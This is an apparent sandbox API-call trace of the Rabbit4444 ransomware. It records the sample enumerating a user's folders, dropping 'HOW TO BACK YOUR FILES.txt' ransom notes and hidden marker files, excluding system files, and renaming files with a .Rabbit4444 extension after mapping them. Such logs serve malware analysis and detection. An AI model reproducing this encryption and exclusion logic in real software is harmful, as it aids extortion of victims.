[0067.640] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35da864c, ftCreationTime.dwHighDateTime=0x1d336d8, ftLastAccessTime.dwLowDateTime=0x35da864c, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0x454541d3, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x25cce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Apps.index", cAlternateFileName="APPS~1.IND")) returned 0 [0067.640] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0067.641] lstrcpyW (in: lpString1=0x130ec64, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0067.641] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\constraintindex\\apps_{c688b2f4-b87a-41d7-ad85-f18c82dab793}\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0067.641] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x280 [0067.641] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0067.642] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.642] CloseHandle (hObject=0x280) returned 1 [0067.642] CloseHandle (hObject=0x228) returned 1 [0067.642] GetCurrentThreadId () returned 0xd98 [0067.642] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122288 [0067.642] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache" [0067.643] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108688 | out: hHeap=0xe0000) returned 1 [0067.643] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122280 | out: hHeap=0xe0000) returned 1 [0067.643] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache" [0067.643] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\" [0067.643] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\.BFC0E91B00AE8A0620D3" [0067.643] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0067.645] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0067.648] FlushFileBuffers (hFile=0x228) returned 1 [0067.649] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0067.649] CloseHandle (hObject=0x228) returned 1 [0067.650] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache") returned 102 [0067.650] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.650] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbccaaf2e, ftCreationTime.dwHighDateTime=0x1d32721, ftLastAccessTime.dwLowDateTime=0x97842c35, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf1a42ff3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0067.650] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.650] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.650] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0067.650] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.650] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbccaaf2e, ftCreationTime.dwHighDateTime=0x1d32721, ftLastAccessTime.dwLowDateTime=0x97842c35, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf1a42ff3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.650] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.650] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.650] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0067.650] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.650] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.650] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf1a42ff3, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf1a42ff3, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf1a42ff3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0067.650] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.650] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0067.650] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97842c35, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x38231567, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x38231567, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="100", cAlternateFileName="")) returned 1 [0067.650] lstrcmpiW (lpString1="100", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.650] lstrcmpiW (lpString1="100", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.650] lstrcmpiW (lpString1="100", lpString2="Rabbit4444.exe") returned -1 [0067.651] lstrcmpiW (lpString1="100", lpString2=".") returned 1 [0067.651] lstrcmpiW (lpString1="100", lpString2="..") returned 1 [0067.651] lstrcmpiW (lpString1="100", lpString2="windows") returned -1 [0067.651] lstrcmpiW (lpString1="100", lpString2="bootmgr") returned -1 [0067.651] lstrcmpiW (lpString1="100", lpString2="pagefile.sys") returned -1 [0067.651] lstrcmpiW (lpString1="100", lpString2="boot") returned -1 [0067.651] lstrcmpiW (lpString1="100", lpString2="ids.txt") returned -1 [0067.651] lstrcmpiW (lpString1="100", lpString2="NTUSER.DAT") returned -1 [0067.651] lstrcpyW (in: lpString1=0x130ec06, lpString2="100" | out: lpString1="100") returned="100" [0067.651] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0067.651] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd6) returned 0x11b7a8 [0067.651] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x122028 [0067.651] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97842c35, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x38231567, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x38231567, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="100", cAlternateFileName="")) returned 0 [0067.651] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0067.651] lstrcpyW (in: lpString1=0x130ec06, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0067.651] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0067.653] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x280 [0067.653] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0067.653] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.653] CloseHandle (hObject=0x280) returned 1 [0067.653] CloseHandle (hObject=0x228) returned 1 [0067.653] GetCurrentThreadId () returned 0xd98 [0067.653] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0067.653] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100" [0067.653] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11b7a8 | out: hHeap=0xe0000) returned 1 [0067.654] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0067.654] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100" [0067.654] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\" [0067.654] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\.BFC0E91B00AE8A0620D3" [0067.654] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0067.658] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0067.660] FlushFileBuffers (hFile=0x228) returned 1 [0067.661] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0067.661] CloseHandle (hObject=0x228) returned 1 [0067.661] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100") returned 106 [0067.661] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.661] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97842c35, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x38231567, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf1a69340, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0067.661] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.661] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.662] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0067.662] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.662] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97842c35, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x38231567, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf1a69340, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.662] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.662] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0067.663] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0067.663] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.663] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.663] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf1a69340, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf1a69340, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf1a69340, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0067.663] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.663] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0067.663] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x381e50b0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x381e50b0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3fb43ddf, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{0079A0FC-58F2-467F-9294-6309B1E659EF}", cAlternateFileName="{0079A~1")) returned 1 [0067.663] lstrcmpiW (lpString1="{0079A0FC-58F2-467F-9294-6309B1E659EF}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.663] lstrcmpiW (lpString1="{0079A0FC-58F2-467F-9294-6309B1E659EF}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.663] lstrcmpiW (lpString1="{0079A0FC-58F2-467F-9294-6309B1E659EF}", lpString2="Rabbit4444.exe") returned -1 [0067.663] lstrcmpiW (lpString1="{0079A0FC-58F2-467F-9294-6309B1E659EF}", lpString2=".") returned 1 [0067.663] lstrcmpiW (lpString1="{0079A0FC-58F2-467F-9294-6309B1E659EF}", lpString2="..") returned 1 [0067.663] lstrcmpiW (lpString1="{0079A0FC-58F2-467F-9294-6309B1E659EF}", lpString2="windows") returned -1 [0067.663] lstrcmpiW (lpString1="{0079A0FC-58F2-467F-9294-6309B1E659EF}", lpString2="bootmgr") returned -1 [0067.663] lstrcmpiW (lpString1="{0079A0FC-58F2-467F-9294-6309B1E659EF}", lpString2="pagefile.sys") returned -1 [0067.663] lstrcmpiW (lpString1="{0079A0FC-58F2-467F-9294-6309B1E659EF}", lpString2="boot") returned -1 [0067.663] lstrcmpiW (lpString1="{0079A0FC-58F2-467F-9294-6309B1E659EF}", lpString2="ids.txt") returned -1 [0067.663] lstrcmpiW (lpString1="{0079A0FC-58F2-467F-9294-6309B1E659EF}", lpString2="NTUSER.DAT") returned -1 [0067.663] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{0079A0FC-58F2-467F-9294-6309B1E659EF}" | out: lpString1="{0079A0FC-58F2-467F-9294-6309B1E659EF}") returned="{0079A0FC-58F2-467F-9294-6309B1E659EF}" [0067.663] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{0079A0FC-58F2-467F-9294-6309B1E659EF}", dwFileAttributes=0x0) returned 1 [0067.664] lstrlenW (lpString="{0079A0FC-58F2-467F-9294-6309B1E659EF}") returned 38 [0067.664] lstrlenW (lpString="Rabbit4444") returned 10 [0067.664] lstrcmpiW (lpString1="9B1E659EF}", lpString2="Rabbit4444") returned -1 [0067.664] lstrlenW (lpString=".dll") returned 4 [0067.665] lstrcmpiW (lpString1="9EF}", lpString2=".dll") returned 1 [0067.665] lstrlenW (lpString=".lnk") returned 4 [0067.665] lstrcmpiW (lpString1="9EF}", lpString2=".lnk") returned 1 [0067.665] lstrlenW (lpString=".ini") returned 4 [0067.665] lstrcmpiW (lpString1="9EF}", lpString2=".ini") returned 1 [0067.665] lstrlenW (lpString=".sys") returned 4 [0067.665] lstrcmpiW (lpString1="9EF}", lpString2=".sys") returned 1 [0067.665] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{0079A0FC-58F2-467F-9294-6309B1E659EF}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{0079a0fc-58f2-467f-9294-6309b1e659ef}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.665] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.665] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15897586409) returned 1 [0067.665] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.665] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0067.665] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0067.665] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.667] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.669] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.669] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0067.669] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.669] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0067.669] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.670] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0067.670] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.670] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0067.670] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15898037957) returned 1 [0067.670] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0067.670] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0067.670] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.670] CloseHandle (hObject=0x29c) returned 1 [0067.670] CloseHandle (hObject=0x280) returned 1 [0067.670] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{0079A0FC-58F2-467F-9294-6309B1E659EF}.Rabbit4444") returned 156 [0067.670] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{0079A0FC-58F2-467F-9294-6309B1E659EF}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{0079a0fc-58f2-467f-9294-6309b1e659ef}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{0079A0FC-58F2-467F-9294-6309B1E659EF}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{0079a0fc-58f2-467f-9294-6309b1e659ef}.rabbit4444"), dwFlags=0x1) returned 1 [0067.671] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b5a769e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9b5a769e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x3fb43ddf, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{034FA7ED-D1B4-4D9A-971D-782B8715E040}", cAlternateFileName="{034FA~1")) returned 1 [0067.671] lstrcmpiW (lpString1="{034FA7ED-D1B4-4D9A-971D-782B8715E040}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.671] lstrcmpiW (lpString1="{034FA7ED-D1B4-4D9A-971D-782B8715E040}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.671] lstrcmpiW (lpString1="{034FA7ED-D1B4-4D9A-971D-782B8715E040}", lpString2="Rabbit4444.exe") returned -1 [0067.671] lstrcmpiW (lpString1="{034FA7ED-D1B4-4D9A-971D-782B8715E040}", lpString2=".") returned 1 [0067.671] lstrcmpiW 